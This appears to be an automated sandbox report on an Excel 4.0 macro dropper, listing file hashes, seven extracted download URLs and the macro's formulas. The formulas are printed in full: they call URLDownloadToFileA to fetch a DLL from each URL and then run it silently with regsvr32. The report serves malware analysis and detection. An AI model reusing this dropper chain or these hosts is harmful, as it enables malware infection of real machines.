Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    bcd542295e496a568e2c670b64ad54451aea620d96d41b420157005a21fc5c65

  • Size

    20KB

  • Sample

    241111-zxhbvawgrh

  • MD5

    c2da44006be8967f01e1748cf703d093

  • SHA1

    d19d3968031d1238a1b2a6584c6358b132f51fc5

  • SHA256

    bcd542295e496a568e2c670b64ad54451aea620d96d41b420157005a21fc5c65

  • SHA512

    721c894c721f266fad34eea7345cd3c4a4c7cd9a0a1bb63f9308c451713d032b4544035ac0c8dccbf058d0062fd1cfc9de2951adb5bbf2bc14b5e8617bcdb1ee

  • SSDEEP

    384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://banrai.ac.th/website/IHI0iNLLWDh9P/

http://bangsoe.dk/__backup/JON6L/

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

https://barkstage.es/wp-content/S0Q/

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

https://www.manchesterot.co.uk/about-us/LFXAJJIa/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://banrai.ac.th/website/IHI0iNLLWDh9P/

xlm40.dropper

http://bangsoe.dk/__backup/JON6L/

xlm40.dropper

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

xlm40.dropper

https://barkstage.es/wp-content/S0Q/

xlm40.dropper

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

xlm40.dropper

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

xlm40.dropper

https://www.manchesterot.co.uk/about-us/LFXAJJIa/

Targets

    • Target

      bcd542295e496a568e2c670b64ad54451aea620d96d41b420157005a21fc5c65

    • Size

      20KB

    • MD5

      c2da44006be8967f01e1748cf703d093

    • SHA1

      d19d3968031d1238a1b2a6584c6358b132f51fc5

    • SHA256

      bcd542295e496a568e2c670b64ad54451aea620d96d41b420157005a21fc5c65

    • SHA512

      721c894c721f266fad34eea7345cd3c4a4c7cd9a0a1bb63f9308c451713d032b4544035ac0c8dccbf058d0062fd1cfc9de2951adb5bbf2bc14b5e8617bcdb1ee

    • SSDEEP

      384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks